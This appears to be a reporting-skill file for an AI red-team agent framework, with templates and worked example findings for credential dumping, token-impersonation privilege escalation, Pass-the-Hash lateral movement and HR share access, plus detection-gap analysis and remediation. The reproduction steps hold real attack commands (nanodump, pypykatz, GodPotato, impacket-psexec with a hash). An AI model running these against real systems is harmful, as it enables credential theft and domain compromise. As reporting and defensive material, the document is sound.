Menu
Post-exploitation finding documentation — credential access, privilege escalation, lateral movement reports, detection gap analysis, attack path documentation, CVSS v4.0 scoring.
Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.
Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.
Final engagement report generation — executive summary, technical report, findings aggregation, attack path narrative, detection gap matrix, remediation roadmap.
Decepticon orchestrator patterns — delegation, state management, adaptive re-planning, context handoff protocols.
Exploitation finding documentation — initial access reports, exploit chain documentation, CVSS v4.0 scoring, shell/credential inventory, detection gap analysis.
Recon output formatting — report structure, CVSS v4.0 scoring (primary), MITRE ATT&CK mapping, finding prioritization, Markdown output, detection gap tracking, handoff checklists.
| name | post-exploit-reporting |
| description | Post-exploitation finding documentation — credential access, privilege escalation, lateral movement reports, detection gap analysis, attack path documentation, CVSS v4.0 scoring. |
| allowed-tools | Read Write |
| metadata | {"subdomain":"reporting","kind":"reporting","when_to_use":"write finding, document escalation, lateral movement report, credential found, detection gap, attack path, post-exploit report","tags":"report, post-exploit, findings, privesc, lateral, creds, detection-gap, attack-path","mitre_attack":null} |
Post-exploitation findings require richer documentation than reconnaissance findings because they demonstrate real-world impact, test Blue Team detection capabilities, and map the full kill chain traversal. This skill provides phase-specific templates and detection gap analysis guidance aligned with PTES, CREST, and TIBER-EU standards.
All agent-authored documents MUST be Markdown format (.md). Operational data files (creds/*.json, network_map.json) are exceptions.
Each post-exploitation phase has a specialized template. All templates share the same YAML frontmatter schema but differ in body sections to capture phase-relevant details.
---
id: FIND-007
severity: high
cvss_score: 8.4
cvss_vector: "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
cwe: CWE-522
mitre: [T1003.001]
affected_target: "WEB01 (10.0.0.5)"
affected_component: "LSASS process memory"
confidence: verified
objective_id: OBJ-004
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T16:45:00Z"
---
# [HIGH] LSASS Memory Dump on WEB01 exposes Domain Credentials
## Description
LSASS process memory was dumped on WEB01 (10.0.0.5) using nanodump, yielding NTLM hashes for 3 domain accounts including a service account with Domain Admin group membership.
## Steps to Reproduce
1. From SYSTEM shell on WEB01:
```
nanodump --write C:\Windows\Temp\debug.dmp --valid
```
2. Transfer dump to attack host:
```
impacket-smbclient //10.0.0.5/C$ -k -no-pass
get Windows/Temp/debug.dmp
```
3. Extract credentials with pypykatz:
```
pypykatz lsa minidump debug.dmp
```
## Credentials Obtained
| Username | Type | Hash/Value | Source Host | Domain | Privilege |
|----------|------|-----------|-------------|--------|-----------|
| svc_sql | NTLM | aad3b435...7cb | WEB01 | corp.local | Domain Admin |
| jdoe | NTLM | e19ccf75...2a1 | WEB01 | corp.local | Domain User |
| web_app | NTLM | 31d6cfe0...e0d | WEB01 | corp.local | Domain User |
## Impact
The `svc_sql` account is a member of the Domain Admins group. With this NTLM hash, an attacker can perform Pass-the-Hash to gain full control over the Active Directory domain, including all domain-joined systems and data.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-007_nanodump.txt | nanodump execution output |
| terminal-log | findings/evidence/FIND-007_pypykatz.txt | pypykatz credential extraction |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR (CrowdStrike) | No | nanodump evaded userland hooks via direct syscalls |
| SIEM | No | No alert for LSASS access or suspicious process creation |
| Windows Event Log | Partial | Event 4663 logged but not forwarded to SIEM |
| Network monitoring | No | SMB transfer blended with normal traffic |
Blue team detection status: **Not detected**. LSASS access via direct syscalls bypassed EDR userland hooks entirely.
## Remediation
1. Enable Credential Guard to protect LSASS from memory dumps.
2. Configure EDR to monitor kernel-level LSASS access (PPL enforcement).
3. Forward Windows Security Event 4663 (object access) to SIEM with alerting.
4. Review service accounts: `svc_sql` should NOT be Domain Admin — apply least privilege.
## References
- MITRE ATT&CK T1003.001: https://attack.mitre.org/techniques/T1003/001/
- Microsoft Credential Guard: https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/
- CWE-522: https://cwe.mitre.org/data/definitions/522.html
---
id: FIND-005
severity: high
cvss_score: 8.5
cvss_vector: "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
cwe: CWE-269
mitre: [T1068]
affected_target: "WEB01 (10.0.0.5)"
affected_component: "Windows Token Privileges"
confidence: verified
objective_id: OBJ-003
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: short-term
discovered_at: "2026-04-06T16:20:00Z"
---
# [HIGH] GodPotato on WEB01 — svc_web (IIS AppPool) to SYSTEM
## Description
The IIS application pool identity `svc_web` holds SeImpersonatePrivilege, allowing token impersonation via GodPotato to escalate from service account to NT AUTHORITY\SYSTEM.
## Steps to Reproduce
1. Confirm SeImpersonatePrivilege:
```
whoami /priv
```
2. Execute GodPotato:
```
GodPotato.exe -cmd "cmd /c whoami > C:\Windows\Temp\whoami.txt"
```
3. Verify SYSTEM access:
```
type C:\Windows\Temp\whoami.txt
# Output: nt authority\system
```
## Privilege Chain
| Step | From | To | Method | Tool |
|------|------|----|--------|------|
| 1 | svc_web (IIS AppPool) | NT AUTHORITY\SYSTEM | Token Impersonation (SeImpersonatePrivilege) | GodPotato |
## Impact
SYSTEM-level access on WEB01 grants full control over the host, including credential extraction from LSASS, access to all local files, and ability to pivot to other network segments.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-005_godpotato.txt | GodPotato execution and whoami output |
| terminal-log | findings/evidence/FIND-005_privs.txt | whoami /priv output showing SeImpersonatePrivilege |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR | No | GodPotato not in signature database |
| SIEM | No | No correlation rule for token impersonation |
| Windows Event Log | Yes | Event 4672 (special privileges) logged but not alerted |
Blue team detection status: **Not detected**. Event 4672 was logged but no alert was configured.
## Remediation
1. Remove SeImpersonatePrivilege from IIS application pool accounts where not required.
2. Configure EDR to alert on potato-family privilege escalation patterns.
3. Create SIEM rule for Event 4672 from non-SYSTEM service accounts.
---
id: FIND-008
severity: critical
cvss_score: 9.3
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
cwe: CWE-287
mitre: [T1550.002]
affected_target: "DC01 (10.0.0.1)"
affected_component: "Kerberos / SMB"
confidence: verified
objective_id: OBJ-005
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T17:10:00Z"
---
# [CRITICAL] Lateral Movement via Pass-the-Hash — WEB01 to DC01 (Domain Admin)
## Description
Using the svc_sql NTLM hash obtained from FIND-007, Pass-the-Hash via Impacket's psexec achieved SYSTEM-level access on DC01 (Domain Controller).
## Steps to Reproduce
1. From attack host, use svc_sql NTLM hash:
```
impacket-psexec -hashes :aad3b435...7cb svc_sql@10.0.0.1
```
2. Verify domain controller access:
```
whoami
# Output: nt authority\system
hostname
# Output: DC01
```
## Movement Details
| Source Host | Target Host | Method | Credentials Used | Access Level |
|------------|-------------|--------|------------------|-------------|
| WEB01 (10.0.0.5) | DC01 (10.0.0.1) | Pass-the-Hash (psexec) | svc_sql NTLM hash | SYSTEM |
## Impact
Full domain compromise. SYSTEM access on the domain controller allows: DCSync for all domain credentials, Group Policy modification, creation of persistence mechanisms (Golden Ticket), and access to all domain-joined systems and data.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-008_psexec.txt | psexec session and whoami output |
| terminal-log | findings/evidence/FIND-008_domain_info.txt | Domain info confirming DC role |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| Network IDS | No | SMB/psexec traffic not flagged |
| EDR on DC01 | Partial | Service creation logged but not correlated with lateral movement |
| SIEM | No | No rule for PtH detection via service creation patterns |
| AD monitoring | No | No alert for svc_sql authenticating to DC01 |
Blue team detection status: **Not detected**. PsExec service creation was logged but not correlated as lateral movement.
## Remediation
1. Remove svc_sql from Domain Admins group immediately — apply least privilege.
2. Deploy Windows Defender Credential Guard on all domain controllers.
3. Enable Advanced Audit Policy for logon events (4624 type 3) with source IP correlation.
4. Implement network segmentation: restrict SMB access to DC from non-admin subnets.
5. Deploy Microsoft ATA/Defender for Identity for PtH detection.
## References
- MITRE ATT&CK T1550.002: https://attack.mitre.org/techniques/T1550/002/
- Microsoft PtH Mitigation: https://www.microsoft.com/en-us/download/details.aspx?id=36036
---
id: FIND-010
severity: high
cvss_score: 8.7
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
cwe: CWE-200
mitre: [T1005, T1560.001]
affected_target: "FILESVR01 (10.0.0.20)"
affected_component: "HR file share (\\FILESVR01\HR$)"
confidence: verified
objective_id: OBJ-006
phase: exfiltration
agent: postexploit
detected: true
remediation_priority: immediate
discovered_at: "2026-04-06T17:45:00Z"
---
# [HIGH] Sensitive HR Data accessed on FILESVR01 File Share
## Description
Using domain admin credentials, the HR$ administrative share on FILESVR01 was accessed. The share contains personally identifiable information (PII) including employee SSNs, salary data, and performance reviews for approximately 2,000 employees.
## Data Classification
| Data Type | Volume | Classification | Regulatory |
|-----------|--------|---------------|------------|
| Employee SSNs | ~2,000 records | PII / Restricted | GDPR, CCPA |
| Salary records | ~2,000 records | Confidential | Internal policy |
| Performance reviews | ~500 documents | Confidential | Internal policy |
## Steps to Reproduce
1. Mount HR share with domain admin credentials:
```
net use \\FILESVR01\HR$ /user:corp\svc_sql
```
2. List contents:
```
dir \\FILESVR01\HR$\
```
3. Verify PII presence (do NOT exfiltrate real data):
```
type \\FILESVR01\HR$\employees\sample.csv | head -5
```
## Impact
Full access to HR data containing PII for ~2,000 employees. In a real attack, this data could be exfiltrated for identity theft, extortion, or sold on dark web markets. Regulatory exposure under GDPR/CCPA.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-010_share_listing.txt | Directory listing (filenames only, no PII) |
**Note**: No actual PII was exfiltrated per RoE constraints. Evidence contains directory listings and file metadata only.
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| DLP | No | No DLP agent on file server |
| SIEM | Yes | Alert triggered for admin share access from non-admin workstation |
| File audit | Yes | Windows file access audit logged the access |
Blue team detection status: **Detected** (partial). SIEM alerted on admin share access but response was not within SLA.
## Remediation
1. Restrict HR$ share access to named HR admin accounts only (remove Domain Admins).
2. Deploy DLP agent on file servers containing PII.
3. Implement SIEM playbook for admin share access with 15-minute response SLA.
4. Encrypt PII data at rest.
Detection gap analysis is the KEY differentiator of red team reporting versus standard penetration testing. For every finding, document whether Blue Team controls detected the activity.
Every finding MUST include a Detection Gap Analysis section:
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR | Yes/No/Partial/N/A | Specific observation |
| SIEM | Yes/No/Partial/N/A | Alert name or absence |
| IDS/IPS | Yes/No/Partial/N/A | Signature match or miss |
| Network monitoring | Yes/No/Partial/N/A | Traffic analysis observation |
| AD monitoring | Yes/No/Partial/N/A | Identity-based detection |
| DLP | Yes/No/Partial/N/A | Data loss prevention observation |
| Windows Event Log | Yes/No/Partial/N/A | Event IDs logged/missed |
Blue team detection status: **Detected** / **Partially detected** / **Not detected**.
Time to detect: N/A or X minutes/hours.
After all findings are recorded, include a detection gap summary in the final report or a dedicated findings/FIND-{NNN}.md when it represents a verified finding. Do not create a legacy findings.md summary file:
## Detection Gap Summary
| Finding | Phase | ATT&CK | Detected | Primary Control | Gap |
|---------|-------|--------|----------|----------------|-----|
| FIND-005 | post-exploit | T1068 | No | EDR | Potato not in signatures |
| FIND-007 | post-exploit | T1003.001 | No | EDR | Direct syscalls bypass hooks |
| FIND-008 | post-exploit | T1550.002 | No | SIEM | No PtH correlation rule |
| FIND-010 | exfiltration | T1005 | Partial | SIEM | Alert fired, slow response |
**Overall Detection Rate**: 1/4 (25%) — partial detection only
**Blind Spots**: Credential access and lateral movement entirely undetected
**Recommendation**: Deploy Credential Guard, implement PtH detection rules, tune EDR for kernel-level monitoring
Attack paths connect individual findings into kill chain narratives. Save to findings/attack-paths/PATH-{NNN}.md. Individual findings use findings/FIND-{NNN}.md filenames.
---
id: PATH-001
name: "External Web App to Domain Admin via Token Impersonation and Credential Theft"
combined_severity: critical
finding_ids: [FIND-003, FIND-005, FIND-007, FIND-008]
---
# PATH-001: External Web App to Domain Admin
## Narrative
Starting from an SQL injection vulnerability in the public-facing web application (FIND-003), the attacker gained code execution as the IIS application pool identity. Using GodPotato (FIND-005), privileges were escalated to SYSTEM on the web server. LSASS memory was dumped (FIND-007) revealing the svc_sql Domain Admin NTLM hash. Pass-the-Hash with this hash (FIND-008) yielded SYSTEM access on the domain controller, achieving full domain compromise.
## Attack Path
| Step | Phase | Technique | MITRE | Source | Target | Tool | Detected | Finding |
|------|-------|-----------|-------|--------|--------|------|----------|---------|
| 1 | initial-access | SQL Injection | T1190 | Internet | WEB01:443 | sqlmap | No | FIND-003 |
| 2 | post-exploit | Token Impersonation | T1068 | svc_web | SYSTEM@WEB01 | GodPotato | No | FIND-005 |
| 3 | post-exploit | LSASS Dump | T1003.001 | SYSTEM@WEB01 | LSASS | nanodump | No | FIND-007 |
| 4 | post-exploit | Pass-the-Hash | T1550.002 | WEB01 | DC01 | psexec | No | FIND-008 |
## Chain Severity Assessment
Individual findings range from HIGH to CRITICAL, but the chain achieves full domain compromise from an external position with zero detection — **combined severity: CRITICAL**.
## Detection Summary
0 of 4 steps detected by Blue Team. The entire kill chain from initial access to domain compromise executed without triggering any actionable alert.
## Visual Path
```
Internet ──[SQLi]──> WEB01:443 (svc_web)
│
[GodPotato]
│
WEB01 (SYSTEM)
│
[LSASS dump → svc_sql hash]
│
[Pass-the-Hash]
│
DC01 (SYSTEM) ── DOMAIN COMPROMISED
```
When individual findings chain together, combined severity often exceeds individual scores:
| Chain Pattern | Individual Severities | Combined | Reason |
|---|---|---|---|
| Info Disclosure + Credential Access | Medium + High | CRITICAL | Credentials enable full access |
| PrivEsc + Lateral Movement | High + High | CRITICAL | Domain-wide impact |
| Web Vuln + PrivEsc + Cred Dump + Lateral | High + High + High + High | CRITICAL | Full kill chain, external to DA |
| Weak Config + Info Disclosure | Low + Medium | MEDIUM | Limited blast radius |
| Finding Type | CVSS 4.0 | Vector |
|---|---|---|
| LSASS dump / credential theft | 8.4 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N |
| PrivEsc to SYSTEM (token impersonation) | 8.5 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| PrivEsc to SYSTEM (kernel exploit) | 8.5 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Lateral movement to DC (PtH) | 9.3 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Kerberoastable SPN (crackable) | 7.7 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| AS-REP roasting | 7.7 | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| DCSync | 9.3 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Unrestricted file share access (PII) | 8.7 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Weak AD config (no LAPS) | 6.9 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| ID | Technique | Common Tools |
|---|---|---|
| T1003.001 | OS Credential Dumping: LSASS Memory | nanodump, Mimikatz, pypykatz |
| T1003.002 | OS Credential Dumping: SAM | secretsdump, reg save |
| T1003.003 | OS Credential Dumping: NTDS | secretsdump (DCSync) |
| T1003.006 | OS Credential Dumping: DCSync | Mimikatz, Impacket |
| T1558.003 | Kerberoasting | Rubeus, Impacket |
| T1558.004 | AS-REP Roasting | Rubeus, Impacket |
| T1552.001 | Credentials in Files | manual search, Snaffler |
| T1555 | Credentials from Password Stores | Mimikatz (DPAPI) |
| ID | Technique | Common Tools |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | GodPotato, PrintSpoofer, JuicyPotato |
| T1134.001 | Token Impersonation | Incognito, SweetPotato |
| T1548.002 | UAC Bypass | UACME, fodhelper |
| T1078.002 | Valid Accounts: Domain | Cached credentials |
| ID | Technique | Common Tools |
|---|---|---|
| T1550.002 | Pass-the-Hash | psexec, wmiexec, smbexec |
| T1550.003 | Pass-the-Ticket | Rubeus, Mimikatz |
| T1021.001 | Remote Desktop Protocol | xfreerdp, rdesktop |
| T1021.002 | SMB/Windows Admin Shares | CrackMapExec, NetExec |
| T1021.006 | Windows Remote Management | Evil-WinRM |
| T1047 | WMI | wmiexec, CrackMapExec |
Before completing a post-exploitation objective, verify:
post-exploit/creds/ AND corresponding findings/FIND-{NNN}.md finding createdfindings/evidence/FIND-{NNN}_{description}.txtfindings/FIND-{NNN}.md documenttimeline.jsonlfindings/attack-paths/PATH-{NNN}.md if multi-step chainupdate_objectivefindings/
├── FIND-005.md # Finding documents — stable FIND-NNN key (id in frontmatter)
├── FIND-007.md
├── FIND-008.md
├── FIND-010.md
├── attack-paths/
│ └── PATH-001.md # Full kill chain narrative
└── evidence/
├── FIND-005_godpotato.txt # Evidence keyed by finding ID
├── FIND-005_privs.txt
├── FIND-007_nanodump.txt
├── FIND-007_pypykatz.txt
├── FIND-008_psexec.txt
├── FIND-008_domain_info.txt
└── FIND-010_share_listing.txt
post-exploit/
├── creds/
│ ├── ntlm_hashes.txt # Operational credential store
│ └── kerberos_tickets/
├── privesc/
│ └── escalation_log.json # Operational log
├── lateral/
│ └── movement_log.json # Operational log
└── network_map.json # Operational data
The findings/ directory contains deliverable documents (Markdown). The post-exploit/ directory contains operational data files (JSON/text) used during the engagement.